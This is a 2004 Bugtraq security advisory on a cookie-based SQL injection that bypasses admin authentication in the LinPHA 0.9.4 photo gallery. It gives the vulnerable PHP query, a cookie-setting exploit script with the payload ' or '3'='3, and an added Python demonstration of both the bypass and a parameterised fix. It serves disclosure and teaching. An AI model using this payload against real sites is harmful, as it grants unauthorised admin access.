Bugtraq: Linpha 0.9.4: authentication bypass

Linpha 0.9.4: authentication bypass

From: Rubén Molina <ruben_at_udea.edu.co>
Date: Thu, 29 Jul 2004 20:48:12 +0700 (ICT)

/////////////////////////////////////////////////////

//// Vulnerable Program: Linpha
////
//// Url: http://linpha.sf.net
////
//// Version: 0.9.4 (latest version)
////
//// Date: July 28, 2004
////
//// Author: Fernando Quintero (a.k.a nonroot)
//// Email: nando_at_udea.edu.co

//////////////////////////////////////////////////////

  I. Affected software description:

  LinPHA is an easy to use, multilingual, flexible photo/image
  archive/album/gallery written in PHP. It uses a SQL database to store
  information about your pictures. It comes with an HTML based installer,
  so you don't need experience in setting up a SQL DB.

  II. Bug

  There is a bug in the code that allows an attacker to bypass the
  authentication of the LinPHA admin. No password is needed: the attacker
  only has to set two cookies of the session and then browse to the
  admin.php script.

  The bug is located at approximately line [25] of the session.php file:

  1. SQL injection allows bypassing the auth

 // Read Cookie

     24 if(read_config('autologin')) {
     25   if(!isset($_SESSION['user_name']) &&
            isset($_COOKIE["linpha_userid"]) && $_COOKIE["linpha_userid"]!="" &&
            isset($_COOKIE["linpha_password"]) && $_COOKIE["linpha_password"]!="")
     26   {
     27     $query_username = $GLOBALS['db']->Execute("SELECT nickname, level, groups FROM ".PREFIX."users ".
     28                          "WHERE ID = '".$_COOKIE["linpha_userid"]."' AND ".      // cookie values are concatenated
     29                          "password = '".$_COOKIE["linpha_password"]."'");        // into the SQL text unescaped
     30
     31     if($row = $query_username->FetchRow())
     32     {
     33       $_SESSION["REMOTE_ADDR"] = @$_SERVER["REMOTE_ADDR"];
     34       $_SESSION["user_name"] = $row[0];
     35       $_SESSION["user_pass"] = $_COOKIE["linpha_password"];
     36       $_SESSION["user_level"] = $row[1];    // Store user level
     37       $_SESSION["user_groups"] = $row[2];   // Store user group membership
     38     }
     39     else // wrong cookie
     40     {
     41       setcookie("linpha_userid");    // delete cookie linpha_userid
     42       setcookie("linpha_password");  // delete cookie linpha_password
     43     }
     44   }
     45 }

  There are two cookies that are validated: linpha_userid and
  linpha_password.

  So I would get in without a password if I inject those cookies.

  I wrote these lines in a test.php:

      <?PHP
      // cookie path assumes LinPHA is installed under /linpha
      setcookie("linpha_userid","1",time()+86400*365,'/linpha');
      // closes the quoted value and makes the WHERE clause always true
      setcookie("linpha_password","' or '3'='3",time()+86400*365,'/linpha');
      ?>

  Load the script before the admin.php file; the new cookies then get
  injected into the query at [29].

  This is possible if magic_quotes_gpc is set to Off in php.ini (with it
  On, the quote in the cookie value is escaped to \' before it reaches the
  query). But anyway, these cookies should be checked before being used in
  the query.
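  The following is an added example, not code from the advisory or from the
  LinPHA project. It reproduces the bypass against an in-memory SQLite table
  shaped like the query above, in Python rather than PHP so that it runs
  stand-alone: it builds the query the way session.php [27]-[29] does and
  shows that the cookie value from test.php returns the admin row, then shows
  an assumed fix (a numeric check on linpha_userid plus bound parameters; the
  project's actual CVS fix is not shown on this page) rejecting the same
  cookies. The table name linpha_users, the sample admin row and the
  placeholder password are constructed for the example. cookie_header()
  shows the encoded Cookie header a browser sends after test.php runs, in
  case you want to send the same cookies by hand instead.

```python
import sqlite3
from urllib.parse import quote_plus, unquote_plus

# Constructed sample data (not from the LinPHA project): one admin account in a
# table shaped like the query in session.php. The password value is a placeholder.
# "groups" is double-quoted because it is a reserved word in several SQL engines.
SCHEMA = """
CREATE TABLE linpha_users (
    ID INTEGER PRIMARY KEY,
    nickname TEXT,
    password TEXT,
    level INTEGER,
    "groups" TEXT
);
INSERT INTO linpha_users VALUES (1, 'admin', 'secret-hash-placeholder', 10, 'admin');
"""

PAYLOAD = "' or '3'='3"   # the linpha_password cookie value set by test.php


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def _session_from_row(row):
    """What session.php [33]-[37] stores on a matching row; None means 'wrong cookie'."""
    if row is None:
        return None
    return {"user_name": row[0], "user_level": row[1], "user_groups": row[2]}


def autologin_vulnerable(conn, cookie_userid, cookie_password):
    """Mirrors session.php [27]-[29]: the cookie values are glued into the SQL
    text, so a quote in either one rewrites the WHERE clause. With PAYLOAD the
    clause becomes  ID = '1' AND password = '' or '3'='3'  which is always true."""
    sql = ('SELECT nickname, level, "groups" FROM linpha_users '
           "WHERE ID = '" + cookie_userid + "' AND password = '" + cookie_password + "'")
    row = conn.execute(sql).fetchone()
    return _session_from_row(row)


def autologin_fixed(conn, cookie_userid, cookie_password):
    """Assumed hardening (not the project's own fix): reject a non-numeric user id
    and bind both values as parameters, so the payload is compared as a literal
    string and never reaches the SQL parser."""
    if not cookie_userid.isdigit():
        return None
    row = conn.execute(
        'SELECT nickname, level, "groups" FROM linpha_users WHERE ID = ? AND password = ?',
        (int(cookie_userid), cookie_password),
    ).fetchone()
    return _session_from_row(row)


def cookie_header(userid, password):
    """Cookie request header a browser sends after test.php ran. PHP's setcookie()
    url-encodes the value and $_COOKIE holds it decoded again, which is why the
    quotes arrive intact at the query."""
    return "linpha_userid=%s; linpha_password=%s" % (quote_plus(userid), quote_plus(password))


def parse_cookie_header(header):
    """Decode the header back into the two values session.php reads from $_COOKIE."""
    out = {}
    for part in header.split("; "):
        name, _, value = part.partition("=")
        out[name] = unquote_plus(value)
    return out


if __name__ == "__main__":
    db = open_db()
    print("vulnerable:", autologin_vulnerable(db, "1", PAYLOAD))   # admin session, no password known
    print("fixed:     ", autologin_fixed(db, "1", PAYLOAD))        # None
    print("header:    ", cookie_header("1", PAYLOAD))
```

  The vulnerable function returns the admin's session values for the
  injected cookies even though the password column was never matched; the
  parameterised version returns None for the same input and only succeeds
  when the cookie carries the exact stored value.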

  ok, That's it!

III. Solution

    The main coder was contacted and the code was fixed in CVS ;).

IV. Greetings

    - Greets to GIGAX people, Sandra195 especially
    - Greets to all the community. I learn from you!

V. Contact

    Fernando Quintero
    nando_at_udea.edu.co
    Medellín-Colombia

VI. Final words

    !!! Viva Colombia !!!!!!!!
Received on Jul 29 2004